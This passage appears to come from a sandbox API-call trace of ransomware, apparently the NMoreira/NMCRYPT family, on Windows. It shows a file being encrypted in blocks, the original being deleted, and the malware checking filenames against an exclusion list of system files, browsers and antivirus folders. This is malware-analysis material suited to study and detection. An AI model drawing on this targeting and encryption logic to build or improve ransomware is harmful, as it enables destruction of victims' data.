(in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=5632) returned 1 [0153.486] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0153.487] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.496] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.496] GetLastError () returned 0x0 [0153.496] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.559] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.559] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.559] GetLastError () returned 0x0 [0153.559] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.560] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.560] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.560] GetLastError () returned 0x0 [0153.560] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.560] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.560] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.560] GetLastError () returned 0x0 [0153.560] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.560] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.560] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.560] GetLastError () returned 0x0 [0153.560] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.560] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.560] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.560] GetLastError () returned 0x0 [0153.560] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.560] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.560] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.560] GetLastError () returned 0x0 [0153.560] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.560] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.561] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.561] GetLastError () returned 0x0 [0153.561] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.561] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.561] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.561] GetLastError () returned 0x0 [0153.561] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.561] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.561] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.561] GetLastError () returned 0x0 [0153.561] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.561] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.561] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.561] GetLastError () returned 0x0 [0153.561] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.561] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.561] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.561] GetLastError () returned 0x0 [0153.561] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.561] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.561] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.561] GetLastError () returned 0x0 [0153.561] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.561] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.561] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.561] GetLastError () returned 0x0 [0153.561] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.562] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.562] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.562] GetLastError () returned 0x0 [0153.562] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.562] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.562] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.562] GetLastError () returned 0x0 [0153.562] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.562] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.562] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.562] GetLastError () returned 0x0 [0153.562] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.562] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.562] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.562] GetLastError () returned 0x0 [0153.562] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.562] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.562] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.562] GetLastError () returned 0x0 [0153.562] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.562] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.562] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.562] GetLastError () returned 0x0 [0153.562] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.563] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.563] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.563] GetLastError () returned 0x0 [0153.563] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.563] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.563] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0153.563] GetLastError () returned 0x0 [0153.563] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0153.563] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0153.563] WriteFile (in: hFile=0x588, lpBuffer=0x29012e0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0153.563] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabskb.dll.mui")) returned 0x20 [0153.563] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui", dwFileAttributes=0x20) returned 0 [0153.563] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui") returned 1 [0153.564] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabskb.dll.mui")) returned 0 [0153.564] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui" [0153.564] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US") returned 1 [0153.564] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXCAF7.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxcaf7.tmp")) returned 0xcaf7 [0153.565] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabskb.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXCAF7.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxcaf7.tmp"), dwFlags=0x1) returned 0 [0153.565] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXCAF7.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxcaf7.tmp")) returned 1 [0153.565] CryptDestroyKey (hKey=0x9ad738) returned 1 [0153.565] wcslen (_String="OK") returned 0x2 [0153.565] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0153.565] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0153.565] CryptDestroyKey (hKey=0x9ad338) returned 1 [0153.565] CryptDestroyHash (hHash=0x9ad6b8) returned 1 [0153.565] CryptReleaseContext (hProv=0x8e3330, dwFlags=0x0) returned 1 [0153.565] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0153.565] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*NMCRYPT") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*Recovers your files.html") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*.exe") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*.dll") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*.lnk") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*.bat") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*.ini") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*.msi") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*.scf") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*pagefile.sys*") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*NTUSER.DAT*") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*AppData*") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*\\winrar\\*") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*\\java\\*") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*\\windows\\*") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*\\ESET\\*") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*\\AVG\\*") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*\\AVIRA\\*") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*Atheros*") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*Realtek*") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*bootmgr*") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*boot*") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*boot*") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*CONFIG.SYS*") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*IO.SYS*") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*MSDOS.SYS*") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*NTDETECT.COM*") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*ntldr*") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*chrome*") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*opera*") returned 0 [0153.566] PathMatchSpecW (pszFile="TabTip.exe.mui", pszSpec="*firefox*") returned 0 [0153.566] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui", pszSpec="*") returned 1 [0153.566] strlen (_Str="NMoreira") returned 0x8 [0153.566] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.566] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.566] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.566] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.566] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.566] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.566] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.566] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.566] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.566] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] 